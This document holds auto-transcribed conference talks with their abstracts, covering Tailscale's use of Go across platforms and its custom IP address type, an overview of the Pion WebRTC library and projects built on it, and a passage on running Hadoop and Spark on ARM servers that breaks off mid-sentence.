device. So tail scale is all in userspace currently. Because you have to do a system call for every packet that goes in or out of the kernel, DevNet TUN has just been getting slower and slower after all the specter mitigations and whatnot. So we'll probably be looking into other interfaces on some operating systems, at least on Linux. But for now we're just using TUN, which is good enough. On Windows we have a little GUI. This is the not open source part. But otherwise all the open source bits work on Windows. So if you want to use the tail scale D daemon or the tail scale CLI, we actually include both of these in our Windows download. So the only part of the Windows download that's not open source is the little system tray icon. For that we use the Alex and Walk package. That is GitHub, Alex and Walk, it stands for Windows application level toolkit I think or something like that. But it lets you make system tray icons in Windows. So we use a very small subset of it. We make the system tray icon and we add some menu items and we disable them and check them and we have sub menus. But anyway you just specify some callbacks for things and you set them checked and unchecked. So it's a pretty go-ish API on top of the Win32 stuff, which is very much not go-ish. For Mac OS there are two options. You could either use the open source stuff again, either just running the daemon and the client or we also have a GUI that's in the Apple App Store. And the GUI part looks like that. It's basically similar to the Windows claim. There's a menu bar application that tells you whether you're connected or not. It lets you log in, log out, change accounts or whatever. It's written in Swift, unfortunately. It'd be nice to be pure go but we have to be a little pragmatic. So that part is written in Swift but we call in to go from Swift. So we have very, very again limited code written in there. The trick from go is you use build mode C archive. And so Xcode then or your Xcode Swift project thinks that it's calling it to a C function. So you write like a little food.h file that declares some extern symbols. For instance, we link in the whole CLI into the main application so we don't have to ship a second application because in the App Store you're not allowed to exec another process. So we can't ship a second binary and have you exec that. So we link the CLI into the application. So if you run the tailscaled.app binary itself with arguments, it just acts like the open source CLI. So to invoke that, we pass in the directory that is the application directory on disk. And in Swift at the very beginning, basically an equivalent of funk main in this application did finish launching. We basically call go BCLI and in the go part you just import C and you export some symbol. This is like a magic C go comment here that puts that symbol in the whatever the symbol table of the C archive part. And then whatever then this code takes over and runs. So in the future, I just saw that there's this Mac driver program that gives you all like these macOS APIs and integration purely from go and they have like gooey stuff working and stuff. So this could be a future interesting direction to at least try out to write macOS applications purely in go without the Swift part. But we'll see. On iOS, we basically use like 98% of the same code or more of as macOS. It's basically identical. This one is not open source because iOS is an open source. So I don't know. And it's also really freaking impossible to because we use these network extensions on iOS, you have to have like special entitlements Apple calls it. So you can't even even if we made the iOS client open source, you couldn't just you couldn't just compile it and run the damn thing because you have to be using an Apple account that's in an organization that has permission to use the network extension API or something. So it would almost be too painful to open source. It's just supporting people trying to answer questions about how you build the thing. But so far we're just sticking with our philosophy that we're open source on platforms that are open source. But the Android client though is open source. You can get it at Tesco. So Tesco Android, it's also in the FDROID store and it's in the Google Play store. It's written using a Geo, which is written primarily by Elias Naur. And so he wrote our Tesco Android client. And so it uses Geo for all like the GUI stuff and a limited amount of Java. There's not a bunch. There's I didn't count the lines, but it's mostly JNI's indigo using basically the same trick. A JNI package that exports some various JNI things. And there's some JNI wrappers around all the typical C to Java bridge API. And then the app itself is pretty small. There's like a GUI backend thread that runs or GoRoutine that runs. And there's the backend part that handles packets that runs. This is kind of what it looks like to call JNI stuff. You declare, you put the native keyword on certain functions in Java and then it calls into, then you export the thing using again the same Sego trick. And then you're in the JNI world. So it's ugly, but it limits how much Java we had to write. All the packet processing again is the exact same code base in Go. On all the random NASs and hardware, the Synology and QNAPs, no BN sense. Basically all of those, we just take the open source code and we use Go, Goose, FreeBSD or Goose Linux and Gorge, whatever. We're not doing most of these builds right now. We probably will start, but there's some community projects to do like Synology and QNAP that are just little wrappers around the open source code doing things like this. On the server side, we're all Go. We have a coordination server that deals with notifying other devices in your network when something changed. So someone's endpoints change or like they, I don't know, the administrator change the ACL policy or something. Some configuration about your network changed and we have to tell the other devices. So we have all the clients are like stuck in a long pole. So a long hanging HTTP request. And that part is all Go. Our database is also Go. We just migrated to LCD maybe six months ago or so. And Tailscale's web administration panel, I would love to tell you it's Go, but it's TypeScript, which I guess is fine. The tooling is not very fine. I'm kind of horrified by the JavaScript tooling coming from Go, but I don't know. I'm biased. But my friend Evan, the wise old Evan, he loves TypeScript and he actually works on the TypeScript team at Google nowadays. So I don't know. I'm willing to keep an open mind and try it out, but I haven't got into it too much. In the future, it'd be nice to maybe move to ES build at least, which is written in Go. It's kind of a TypeScript or it's like JavaScript and TypeScript and everything that world front end tooling replacements. I don't really understand any of this stuff, but the numbers on it look good. All right. So the second thing I want to talk about was how we added NAT traversal to WireGuard. WireGuard by itself doesn't deal with any firewalls or NAT traversal things. It kind of assumes that the internet is wide opening, connectable, which is a nice dream and we want to help make that dream possible. So we have a blog post about all the tricks you can do to get through NAT so you can have two peers that can actually connect to each other. This is applicable for all software that needs to connect peer to peer, whether that's Web RTC or whatnot. But we have a bunch of pretty pictures that kind of explains the theory behind it. First I want to show the WireGuard Go code base that we use. Tailscale is just written on top of WireGuard and we use their Go implementation. And their Go implementation has a number of interfaces. One of them is CondutBind. I omitted some of the methods, but the interesting ones here are there's methods to receive a packet over either IPv4 or IPv6. This is an encrypted packet and you've returned the number of bytes you read and the endpoint, which is basically a map. It's another interface, but you basically map from the address you got it from or like however you know what user or what peer this is associated with. Then there's another method to send a plain text packet to that endpoint and then WireGuard does this encryption and sends it out to the endpoint, whatever the addresses of that endpoint are. And then there's going to be close. So we have this package called MagicSoc, which implements this interface. So we have a whole bunch of stuff, but notably like those things you just saw receiving IPv4 or IPv6 or send. And so what this package is trying to do is always finding the best path to these endpoints. So we want to work in all environments, including environments where like UDP is blocked, whether that's some crappy hotel or airport that blocks UDP or some corporate environment or whatever. So in that case, we'll fall back to we offer a TCP relay and we have a whole bunch of like globally distributed servers, much like Cheapo VMs, like five bucks a month, but we just have a ton of them. And your client picks the nearest one. And that's this setDirtMap. Then tail scale first connects, we give it a data structure that has all of our all of our like kind of edge nodes. And these DIRP services are is basically an encrypted packet relay where you in the IP header instead of the address you want to talk to what IP port you want to talk to you, instead of the IP header is like effectively the public key you want to send the encrypted packet to. And so we don't know what we're sending, right? It's a big encrypted wire guard blob. But we route these around for you. So if you don't have direct connectivity yet, then we'll route your your wire guard packets. But then what the magic sock packet does is once it does all these NAT traversal tricks and figures out in punches holes and like the NAT state machines and the connection tracking tables, then the clients transition within like a second to direct connections and they stop using the DIRP relays. Last thing I want to talk about was the net IP type. So this is the standard library type to represent an IP address. The representation is a slice of bytes. The problem with this is it's mutable because it's a slice of bytes. And that's part of the contract that if you have one of these or you give it to somebody, you don't know that they're not going to mess with it. So you know, you have to do defensive copies that's always kind of what ends up happening when you have mutable public things. It's also transparent. It's not opaque type. The underlying type is a byte slice and that's part of it's the go one contract. So it's not like we can fix that and go as opposed to things like time that time, which was just an opaque struct. So when a go one dot nine needed monotonic time support, we just changed the representation of time and it just worked out and nobody like knew that we changed the representation of times. But because the net IP type is a, you know, the underlying type is a bite slice, you can't do anything with it. It's also not comparable. It's not comparable because it's a bite, it's a slice and in go, you can't use a slice as a map key and it doesn't support equal to equal. It's also like really big, you know, an IPv6 address is only 16 bytes and IPv4 address is only four bytes. But to store one of these in go, you need a 24 byte slice header and that doesn't actually store any of the address bytes. You still need then, you know, the slice has to point to an underlying array that's either four 16 bytes and go by default parse IP always return 16 bytes. So you end up with 40 bytes to store a four byte IPv4 address. So it's a little wasteful. And there's actually two IP address types in the standard library. There's a, there's the one that can store IPv6 zones and the ones that can't. So some of the APIs return one, some return the other, some take one, some take the other. So it's kind of weird that there are two. Also the, in the standard library, it's, you know, arguably a feature but also a bug that it kind of, it does the IPv6 mapped IPv4 address mapping for you automatically. So if you got some, if you got two strings from the network, one user told you, you know, I am 1.2.3.4 and the other ones that my IPv6 is colon colon fff fff fff fff fff fff you can't tell them apart because they have the exact same representation and memory. You know, again, it's kind of a feature but it's, it's kind of a bummer that that information gets lost. So we made our own IP address type. I'd kind of been stewing on this for a while. It's inet.af.adder.ip. The af of course stands for address family. To kind of jump to the end of the story, the end, the representation ended up looking like this. We've changed it like four or five times but I think, I think this is the final answer. We'll see. So we have, we made a Uint 128 type which just has two Uint 64s, high and low and that's in that adder is where we store the v6 address or the, or the four bytes of the IPv4 address. And then we have this thing that will explain more in a bit that encodes both the IPv6 zone and the address family in one depending on what pointer value you put in there. So the advantage of this representation is it's immutable. So you can pass these around like a time dot time and you know, nobody can mess with them. So we can change the representation for a sixth time if we find a better way to represent IP addresses. It's only 24 bytes. So it's much, it's the same size as a slice header in Go. So it's the same size as a net.ip, just the header part itself and we don't have to store the data. So it's one, it's a value type. There's no allocations. I guess I should have listed that too. That as opposed to the standard library that allocates, this type doesn't allocate at all. We also can store the difference between v4 and v6 and it does v6 zone. So we don't need two different types, one like IP and one like IP adder. So to do that magic, you know, a fam or zone field there, we made this other package called intern which is an unsafe package and it's kind of gross but we've tested it and audited it and tested, you know, talked with other people a bit. So we think it's correct now. The API is very simple but very aud. We have this value type. This is the whole API on the screen. I just kind of had to shove it in here to fit. There's this opaque value type that use the pointer of it because we need finalizers. We need the pointer of this value and we have some stuff in there. But the idea is you want to get a globally unique for global unique when the scope of your process, a globally unique pointer to a value that is one to one with some comparable value. So the contract we say here is if you get V and get V2, the returned value is equal if and only if the return pointer will be the same for get one of V2 if and only if the two arguments you passed in are equal. So if you call get a foo at one point of your program and later you saw say get a foo, the returned value will be the exact same pointer. So the naive implementation of this and then you can get back that original thing you passed in. You can get a comp value passed in, you can get it back out by saying get. So the naive implementation of this is you would just put it in a map keyed by an empty interface and it would just grow infinitely. But we don't want to leak memory infinitely, especially if you're like parsing IP addresses from the network that have a zone or whatever and it just grows and grows and grows. So we want to do some cleanup. So the trick is we have a package level mutex that guards a map. And the map is keyed by effectively an empty interface and it points to the Uint pointer of the value. So we're hiding the pointer from the garbage collector to let the garbage collector collect those values anyway. And so this one basically doesn't contribute to the effectively the reference count of the thing. So then internally when we get these we have to use this go no check pointer, this compiler directive because go would otherwise tell us that we're doing it wrong and this code is not safe. And so we have to declare yes, yes, we know that we're violating all the rules and this is terrible. And so the implementation we have a safe implementation too just for checking ourselves. But in practice what it ends up doing is doing a lookup on the map and if it we find it in the map then we take it from the Uint pointer to an unsafe pointer and then get to the value and then we mark the resurrected flag which we have on our value and then we return it. So I'll explain resurrected in a second. But basically that says it was potentially dead. This thing could have been the last known reference and it could have just like it could have been in the process of dying and being collected by the garbage collector and we just brought it back to life through this Uint pointer. Otherwise we make a new value. So this makes a new value pointer with resurrected false and whatever and then we set the finalizer on it and we put it in the map but we don't put the value pointer itself in the map we put the Uint pointer of it in the map. So the finalizer which we had registered with runtime set finalizer we grabbed the mutex again the exact same mutex that was used to get the thing and if the value that we're finalizing was resurrected that means we lost the race. Somebody else brought this back to life right as the garbage collector was trying to kill it. So we turn resurrected false on and we reinstall the finalizer that the runtime had just removed for us before it called our finalizer. You can only have one finalizer on an object and when the go runtime calls your finalizer it's saying that that thing is really dead but you have one last chance to bring it back to life. And so this is us bringing it back to life. If it wasn't resurrected then we just delete it from the map and then our map actually shrinks back down to zero. So then what we do is we have this intern value so this pointer is guaranteed to be global unique within the process. So we also want to encode the address family in there. So we have some sentinel values and we want the zero value to be bogus so we make z0 basically means that's the zero value for an IP it's uninitialized. Z4 is a sentinel value that means it's an IPv4 address. Z6 no zone is a sentinel that means it's a v6 address but it doesn't have a scope or a zone. And then our accessors to add a zone to an IP we have this method with zone and if it's not a v6 address to begin with it doesn't make sense to have zones we just return the IPn change to whether it's the zero value or v4. If we're trying to clear the zone we just set it to that sentinel that we had before that z6 and a zone and if it's some non-empty string we call our package the intern get by string and this returns a global unique within the process pointer that we assign to get z and it's that pointer has a reference to the zone that we passed in. So then we want to get the zone back out again if it's a zero value so if z is nil we just return I guess this should say z0 instead of nil but whatever it returns empty string otherwise we call get on the thing and this could return it could return a nil interface but that's why we do this comma okay and we say we want a string out of it if it's a string if it's not a string I don't care give me the zero value of a string and then we return the zone. So anyway that was fun so we're using this IP address type more and more for all of our stuff and kind of pushing it down to all our dependencies and it kind of makes life a lot easier and it has a whole bunch of stuff it does um IP sets and ranges and sitter math and lets us cut up sitters in various different ways and find all the ranges within them or take a range and find all the overlapping sitters to fill that space and so lets us do a whole lot of network math. If you have any questions let me know and if you haven't tried Tailscale try it out it's pretty fun and pretty empowering and I think it's nice. Thanks.
|
I worked on the Go team at Google for about 10 years working on bits of everything, but primarily the standard library (net/http, etc) & its build system. In that time I wrote lots of Go, but almost primarily for Go itself. Joining a startup, I now finally get to use Go all day to build a real product (Tailscale) and it's super exciting. We use Go on the server and in 5 clients: Linux, Windows, macOS, iOS, Android.
|
10.5446/53657 (DOI)
|
Hi, my name is Sean and today we're going to talk about Pion WebRTC. First off, before we actually talk about it, I want to thank everyone who's involved with the project. Pion is a completely non-commercial open source project and we'll talk more about what it's doing. But first off, I want to thank, and these are all the names of the people that have contributed. It's a community project and without these people it wouldn't be possible. I'm super excited to see that we've now crossed over 300 contributors and we've actually had 11 people in the community get jobs. So I'm really excited at how fast the community is growing and if you're interested in being involved in open source, Pion is a great place to be. So first off, before we even get into what you can build with Pion and what it's all about, first let's talk about what is WebRTC? WebRTC was originally designed as a protocol between browsers and servers and it gives you end-to-end secure connection between peers. So that means that I can exchange audio and video and data and no one can see what I'm talking about. You can send multiple audio and video tracks, you can send your desktop and your webcam at the same time along with audio and you can also do binary data. So that's super important if you're doing tele-operation or you want to exchange chat messages or just metadata. And it can be lost, it can be unordered or it can act exactly like a web socket. It gives you that flexibility. And the great thing about WebRTC is it's available in a lot of places. So we have a Python implementation, we have a TypeScript, we have Go, Rust 1 is coming up and then we have Google's implementation in C++. So we have a lot of implementations and what's exciting is I think that WebRTC is slowly becoming maybe the best protocol to have inner process communication between different languages. And it's not just, it doesn't require some PubSub server, it doesn't require them to be running in the same network and we'll talk more about what that means later but this is exciting. And then also outside of Python I'm working on a book called WebRTC for the Curious and it's on how WebRTC really works, not just the APIs we're going to talk about today. And it's a deep dive on the protocols to understand what's going on behind the scenes and the history of WebRTC and then also the great stuff like WebRTC in practice so you can understand debugging and teach you the sharp edges before you hit them yourself. So at a high level, like what does WebRTC solve? WebRTC lets you connect to users that have no public IP. And what that means in practice is you can have two computers that are in completely different networks. On the left let's imagine that's you and your home network, on the right is someone you want to talk to. Your private IPs don't route to each other. You can't say I want to talk from 192.168 to a 10.5. You're in different subnets, it's never going to work. But you do know each other's public IPs. So how can you talk to each other? How does this work? WebRTC uses an attribute of networks called naturalversal. And naturalversal allows you to establish a temporary hole in your network by hitting a stun server or an outside host. And what that does is a NAT will actually give you a temporary hole that people can communicate with you back in just by sending an outbound packet. So here we have a host inside this subnet that sends a single packet out to the stun server and it responds. Now anyone can talk to you. Think about it almost like automatic port forwarding. Instead of having to go into your router and configure that this port resolves to this host, you're a WebRTC agent can create these temporary holes and talk to anyone via them. The other thing that WebRTC gives you is mobility. So if you've ever used try to do streaming over TCP, either just data or video, you know that when you roam, you have problems with connectivity. You have to end the TCP connection. You have to start it up again. You have to deal with congestion control and all these other things. The nice thing is WebRTC has that built right in with ICE restarts. So if I'm talking to someone on my phone and I'm having an audio call over my Wi-Fi, I can walk outside, do an ICE restart and the connection starts up all over again. Even though my IP has changed, we don't have to renegotiate. We don't have to re-exchange certificates. We don't have to do any of that. Like it's built right into WebRTC and the congestion control kicks in and everything just works. And speaking of congestion control, you've never heard this term before. A lot of people will think that you can just run a single bandwidth analyzer. So let's say you want to stream to YouTube or Twitch. You think, okay, I'll sit down and measure my network and that's all configure OBS to stream. But in practice, that's not how real world networks work. What if you're streaming and then three more devices join a network and you have congestion? So before you had 50 megabits per second available, now you only have 50 divided by 3 because you have these additional devices. How does that work? WebRTC has built-in congestion control that sends back reports and says, I got these many packets. I lost these many packets. This is my round trip time. And the sender can actually adjust their bitrate live and give you the best experience possible. It's all about tuning. Like what kind of video do I want to send? What bitrate do I have available? And how do I tune that experience to give my viewers the best possible? WebRTC also has a solution for head of line blocking. So if you're not familiar with this problem, the issue is what if you send some data that actually isn't that important, but then you're blocking stuff that is important that's happening now? So let's say you have a system that's sending telemetry data. It's not that important, but you're actually sending valuable data. You don't want to block on the telemetry. So what WebRTC has is data channels, which uses a protocol called SCTP. And in that protocol, you can actually mark certain packets as like, if this isn't delivered, I don't care. And so instead of in a network that has a lot of packet loss, or maybe you don't have, you have a bottleneck on bandwidth, instead of blocking, you mark a single packet with max retransmits of zero, and you don't have that problem anymore. New data flows on block and guarantee and delivery is guaranteed through retransmissions. So on stream two and three, you're guaranteed that packets will arrive on stream one, you don't care. It's nice to get that data through, but if it doesn't arrive, it's not that big of a problem. So now you kind of know what WebRTC is. Let's look at how do we actually build a WebRTC application and go. WebRTC uses the offer answer paradigm. So what that means is that you have two WebRTC agents, let's say you and a friend. What happens is one of you makes an offer. That offer contains things like, these are the codecs I support. These are how many tracks I wish to send you. This is my IP address that I discovered via Natroversel. You make an offer, the other side responds with an answer. So now that you have the offer answer, you have an established connection. You can create a data channel. A data channel is just one stream of data, and then the second function is an options argument that lets you specify, like, do I want lossy? Do I care about packet loss and other things like that? And you create that data channel, and then you set an on open handler, and the data channel opens, you send some text. And what's great about this is this works between so many platforms. So I can set up a data channel connection between a browser. I can set it up between a go process. I can set it up between a mobile application. You have WebRTC that's supported on Android, iOS. We have a Rust implementation coming up. This is what's super exciting to me, is these data channels I think are the best way to exchange data that exists right now. And then on the other side is just receiving data channel messages. You set a handler for on data channel, and then you set a handler for on message. We also provide a more go-like interface that feels like an IO reader writer, but this is the idiomatic WebRTC implementation. And another cool thing is if you write your implementation in Go, we actually provide Wazm bindings as well. So you can build just as you expect any Wazm application, and it spits out and it works right in the browser. Finding video is easy as well. You create a new track, you add frames to that track, and you send them. On the other side, you set an on track handler, and you read from them, and that's it. So what kind of things could you build with Pyon, or what are the things people are building today? These are some of the open source projects that excite me the most in the space, and there's a lot more out there than just this. So if you get a chance, check out Awesome Pyon. It's a list of all the things that people are building. This is really a cool one, where a user has a Nintendo Switch that they're sending the video frames out, and then they're sending it to their VR headset. So this is a testament to the fact that you have WebRTC support and an Oculus headset, that you can send video frames over the network, and it's low latency enough that I can sit with a Nintendo Switch in my hand and play the game, but it still feels responsive enough that it's still worth playing a game. So right here, we're not playing something fast enough like a first person shooter, but it does show how immersive and an experience you can build. It's a cross-platform protocol, and you have this kind of flexibility. This is a Go project called Kerberos, and what it's doing is it's making existing security cameras available over the internet in a secure way. So RTSP by default doesn't have security, so you probably shouldn't be streaming it over the internet. But thanks to WebRTC, you can run a WebRTC agent in the network with a security camera and then watch it over the internet. You don't have to put these cameras on the public internet because you have natural versatility. You don't have to worry about security because WebRTC is secure by default, and it's actually mandatory. So this is a great project, and it's super easy to deploy, and it's another example of what kind of power WebRTC can bring to the Go ecosystem. Cloud Retro lets you play old NES games right over the internet, and how it works is it's running an NES emulator on a remote AWS instance and it's shipping the video frames back to you, and then you're controlling the emulator via the data channels that we talked about earlier. And because you're running this emulator in a shared location, you can play games with a friend. So you can play multiplayer games, you can save your game state, you can do lots of interesting things thanks to running in a central location. And speaking of running stuff in a central location, this is a really exciting project that I think took off during the whole work from home and pandemic is the ability to run a web browser and not have to run that web browser in an AWS instance and share it with other people. So you access this web browser and multiple people can control it at once. I can watch a YouTube video and multiple people can click around the interface. We have chat on the right, and you can do things like browse documentation together. You could work on a project, you could shop together. It's this browser, it's this co-browsing experience that works for everyone. Completely open source and you can go check it out at that URL. Telego kind of taps into the robotic space. So it hasn't been published yet, but there's a couple really interesting companies that are using PyOn to do tele-operation with WebRTC. So you're sending robots the commands over the data channel and then you're receiving video frames back via WebRTC. And it has all these cool things like congestion control. So as the robot moves in and out, it can increase or decrease the bit rate depending on what's available. It's ubiquitous. So now I can control the robot via my phone. I can control it via a browser or I can have a native client. And then WebRTC also lets me take conferencing right into my terminal. So WebRTC isn't just a browser protocol. It isn't just like an Android or iOS. Here I am chatting with someone in their browser, but I'm in a terminal. It's a WebRTC is a standardized protocol that works in lots of places. The creator of Cloud Game then created a subsequent project called Cloud Morph, where now you can run wine applications and stream them over the internet. So you can run Diablo 2, you can run CAD on a remote GPU instance in AWS. It opens up a lot of these possibilities and it's all simple and scriptable. And the great thing about Go is how easy it is to deploy these things. There's no building C++. There's no dealing with pulling in a bunch of libraries via the package manager of choice. It all just works. It's a pleasure to use this and the latency is great. It's a fantastic project. I think WebRTC also has a chance to really revolutionize how people do things in the ops space. So a lot of smaller companies still have a jump box where you SSH into one host that's on the public internet and then you'll have SSH in the host behind that. You don't have to do that anymore with WebRTC. Because of that natural, so that laptop can access the server and it just works. You don't have to put the server on the public internet. It just they connect right away. I think that's super powerful. It's great for security. It reduces the amount of ops burden of putting those servers, you know, managing mappings and names and stuff like that. Open source. I think you can build some really cool stuff with this. You don't have to worry about running VPNs. And then you also can access right from your browser. There's no reason that it has to be to go processes. You could SSH in or simulate SSH over WebRTC. Snowflake was one of the original Pion projects that kind of like brought more attention to Pion and it runs, uses the data channel to do censorship circumvention. So if you have a user that over data channels, they can request, Hey, can you please send me this website that's blocked by my ISP or by my government? It'll download it for you and send it back over WebRTC. And the great thing here is you don't have to download a download a binary. That binary is probably blocked by the already. So you can't download it, but you can't block WebRTC since it's used by so many important things like Hangouts and Zoom and other things like that. Web wormhole lets you exchange files over the internet. So you can, you have a go client and you have a browser client or you can do go to go. So you don't have to send a file via email and then have it be decrypted and have your worry about your mail host accessing and other things like that. Like it's peer to peer and the only person that can decrypt it is on the two ends. And then I think Pion's also bringing a lot of interesting things to the VR space. So here we have a VR experience where the user is moving through the virtual space and their head is actually imposed on their avatars and moving through the space. And you have these interesting things like spatial audio and recreating all these experiences that we can't have now because of the work from home and COVID. Project LikeSpeed is a brand new project that lets you stream OBS to a public server in sub-second time. So instead of having a set up an RTMP server and worrying about HLS, it just does OBS via WebRTC and then anyone can view it. It's super powerful because you don't have to worry about transcoding. It's really easy to deploy. Thanks to Go and a really bright future head for this project. So there's a lot more projects. GitHub.com and go to our awesome Pion repo. We want to share your projects. So if you're building something cool, we'd love to promote it for you. I think there's a lot of great career opportunities that also come from this. I've had developers that built this interesting project. They got hired out of it. They put it on the resume. So if you're looking to get involved with something, we'd love to have you. So come get involved. Join our Slack channel and gain deep WebRTC knowledge. And it's also a fun challenge where you pick the goals. You're on your own timelines. If you want to build something, you get to own it and build it all the way through, which is a really welcome challenge for a lot of developers. So here are all the places you can find us under GitHub.com. Grab an issue, reach out to me directly on Slack, and I'd love to help you get started. It's completely non-commercial. It's a great place to get involved. So we'd love to have you and hope you've learned something interesting in this talk. Thanks.
|
In 2020 we saw a huge spike in interest for RTC. Developers worked quickly to build new tools with the challenge of a socially distanced world. Go has really started to make strides in the RTC world with Pion. Easy deploy, great performance, memory safety and ability to prototype helped it take on C/C++. This talk shows you some basics on WebRTC, then how to use Pion and what you can build with it What does WebRTC give us? What technical real world limitations does WebRTC need to overcome to give us that? WebRTC broken down to 4 parts - Signaling - Connectivity - Encryption - Media/Data - Pion Connecting Using DataChannels Using Media
|
10.5446/53659 (DOI)
|
Hi, welcome to this video. My name is Chen Yu Zheng. I'm from Fawai. In the past two years, our team have been promoting AMP data centers in various areas and the corresponding open source communities. In the next 20 minutes, I will share the works we have done in the big data area, which we think could make users life much easier. The content will be divided into three parts. In the first part, I will introduce the background of our work, including our original intention and why we want to do it. In the second part, I will introduce what we have done in the big data open source communities and what are the benefits. And in the final part, I will share some test data from our demo and give the audience some basic ideas about using AMP data center with big data projects. Okay, let's start. The diversified computing and ARM. In the past few decades, we have experienced technology booming and innovations that are so fast beyond anyone's imagination. 30 years ago, personal computers and the Internet are so expensive that only governments organization can afford. Before we can notice, we have already walked through the mobile Internet era and entered the brand new intelligent era with all things connected. In this era, everyone is talking about cloud, AI, IoT and big data. In order to make this new scenario functional, the computing power demands have grown rapidly in the past few decades too. There are also various innovations on computing architecture that can help break bottlenecks in the traditional architecture and boost the performance in certain areas. There is a thing that we have entered the post-mortem law era. We believe that in this era, make the most use of diversified computing is the key to fulfill the increasing computer power demands. When people talking about make use of diversified computing, they can mean different things. A more traditional idea is to combine different types of computing sources. A lot of projects have already done this. They have enabled GPU, FPGA or ASIC in their workflow to provide better performance in certain areas. The most popular case could be GPU provides better performance in AI tasks. But today, I want to focus on the general purpose CPU only. Actually, in the CPU world, there are also different types of architectures that have their own unique properties, such as the well-known X86, ARM, PowerPC and the open source RISC 5. With the most use of those, can also bring users a lot of benefits. Among all those CPU architectures, X86 is for sure the most popular one, especially in the open source world. And today, I want to talk about how we can add ARM to the cluster. Want to know why? Let's walk through some facts first. According to Wikipedia, ARM architecture has been introduced in 1985. According to the official website, the shipment of ARM chips reached 100 billion in 2017. And that's 32 years after the architecture was born. But from 2017 to the start of 2020, the shipment has become 160 billion. And that's only the beginning of 2020. If we take the shipment of 2020 into account, we can say that in the last three years, there are as many ARM chips sold as it used to sold for 30 years. And yes, the majority of the shipments are mobile devices and IoT devices. But things have changed in 2020. If you check the top 10 most popular words for IT industry in 2020, I believe ARM should be one of them. There are tons of news about IT giants looking to ARM data centers and PCs. Some of them are still rumors, but most of them are already on the market. There are already a lot of ARM chips for data centers and PCs from different companies on the market. And there are also ARM virtual machines provided by the top cloud providers. With all these facts and technology trends behind it, we believe that promoting ARM data center to the open source community is a valuable thing to do under the current circumstances. So, how are we doing this? The first thing we do is to enable ARM in the upstream development workflow. Let me show you the details. In a typical open source development workflow, the contributor wants to contribute some codes to a project. He or she has to write the codes, build and test the codes on his or her local development environment. After everything is checked, he or she can push the code to the project repository, for example, on GitHub. And the code will also be built and tested there, and if everything works okay, the codes might be merged to the mainstream. After a certain period of time, the project might build and release a package for users to use directly. All those tests in the workflow guarantee the quality of the project. Since X86 is the major product on the market, and the continuous, highly-quality contribution from X86 users and vendors, for the majority of open source communities, the development workflow mentioned above is built on X86 platform. So, for X86 users, the quality is good for sure. But for ARM users, or users in other platforms, there might be problems. As the workflow does not provide build and test on those platforms. In order to provide a quality assurance on ARM platform, the first thing we should do is to propose to add ARM resources to the development workflow, and run the same test to achieve the same quality for ARM users. And that's exactly what we did. Speaking of providing ARM resources to the open source communities, there are actually several choices. You should check which one is the most suitable for the community you're aimed. For example, projects like Hadoop uses CI system from the Apache Foundation. It is a Jenkins system. So we have to donate resources to the system and add the corresponding jobs. Spark on the other hand is a little bit different. It also uses Jenkins, but it is a separate system maintained by the AMP lab. So we donated ARM servers to the systems too. The server we donated usually comes from public clouds, like Huawei cloud and AWS cloud. They can both provide powerful ARM servers. Many other projects now use this travel CI. Luckily, travel CI supports ARM now. So for those projects, we just have to add a new job identical to the existing x86 jobs. There are also some platforms that can provide free ARM resources, such as the Open Lab. It is based on the Zoo project from the Open Infrastructure community, which can provide ARM and x86 CI resources. And Linaro also have a platform called Linaro Developer Cloud, which users can apply for ARM resources for development purpose. In the last two years, our team have gotten in touch with the most popular big data communities. We have proposed and donated ARM resources to set up AMP CI in those communities. In 2019, we have fixed a lot of issues and successfully enabled two major projects, Hadoop and Spark. And with the demonstration effects of these two popular projects, we have enabled more projects in last year. And we will keep the work in 2021. I will put the links of those CI's in the end of this video. You can have a look in case you are interested. Our next step to make users' life easier is to provide a pre-built package for their own platform. After about nine months of stable running of the ARM CI, the Hadoop community have released their first release that officially claimed ARM support and provided a pre-built banner list in the download page. Since we are talking about Hadoop, I would also like to share some details about what we did in the community to make it work on AMP. It might be useful for those who might be interested in supporting other projects. Hadoop is a Java project, so it should work on any platform. Well, this is largely correct, but there are still problems. It is because Hadoop is also an very old project. Some of the projects Hadoop dependents on lacks ARM support. The major one is the protocol buffers. Most Apache Big Data projects are still using protocol buffer 2.5.0. And it lacks ARM support. The ARM support was added in version 3.5, so we propose to upgrade the dependency. Upgrade protocol is a quite big task, as it has been used in many places. It takes us about six months to discuss and work with the community. And finally, we have upgraded to 3.7.1. The rest are similar. We made the JRPC level DB and Netty be able to work on ARM. And we propose to use the newer version with ARM support. After all this, we have provided a Dockerfile and script to help the release manager to release the pre-built binary for ARM platform. Except for the dependency problems that could block Big Data running on ARM platform, there are also some very interesting findings that could affect the actual usage. After we have added the CI's to the Big Data project, we started to observe some strange cases. In some test cases with mathematical calculations, we saw that the test results are different in X86 and ARM. For example, when calculate log 3, the 16 digits after decimal points are different in those platforms. After some investigation, we found that the Java provides two libraries to calculate mathematical calculations, the math library and the strict math library. Most projects use the math library. In the math library, when calculate, it first calls for default implementation. It will check whether there is an architecture-specific optimized implementation available. Those implementations could provide better performance, but sometimes the mathematical precision is not guaranteed. And that's actually our case. On X86, there are optimizations to use assembly, and the 16 digits after decimal is not correct in mass. In JDK8, ARM does not provide optimization. In JDK11, ARM have an optimization with mathematical precision guaranteed. So, if you want to calculate the value in a mixed deployment, or you care more about precision rather than the slightly performance improvement in those calculations, you should consider using the strict math library instead. So now we know that it works on ARM. But how good could it run? What kind of benefits could it bring to our users? Here I have some results of the comparison using the previously mentioned Hadoop release, which could probably provide some ideas. Before we get into the details, let's have a look at one of the ARM's well-known benefits over X86, the price. Here I selected some major cloud providers in different areas that can provide ARM virtual machines and bare metal servers. We can see that in both AWS cloud and AhoiWe cloud, compatible ARM VMs can save about 20 to 24% of annual expenses. And in Equinex Metal, previously known as Packet Cloud, the ARM bare metal server can provide up to 15% decrease in the expenses, and that's a lot of money. But money is an only thing users care so about, that's for sure. So let's look at the performance. There are some methods that users can add their ARM nodes to their existing X86 Hadoop cluster. If you does not want to mix them up, you can use the node label expression feature to mark those nodes into different groups and arrange jobs that are more suitable for different types of CPUs. But of course, you can also add the ARM nodes to the existing deployments directly. Just to be aware of that there might be problems, let's the math library I mentioned above in a mixed deployment. In our case, we did not use the labels, and we added the ARM nodes to the cluster directly. We have deployed four clusters with identical hardware, but we are replacing the X86 worker one by one to see how it will affect when we introduce ARM nodes to the cluster. We used a typical 50GB Sterasot benchmark for the comparison. We run a job for each cluster for 10 times and calculate the average. From the results, we can see that in general, with more ARM nodes replacing the X86 nodes, there are some attenuations in the overall performance. The overall attenuation is about 8% if replaced all three workers with ARM nodes. This is because the per core compute power for ARM is still weaker than X86. When 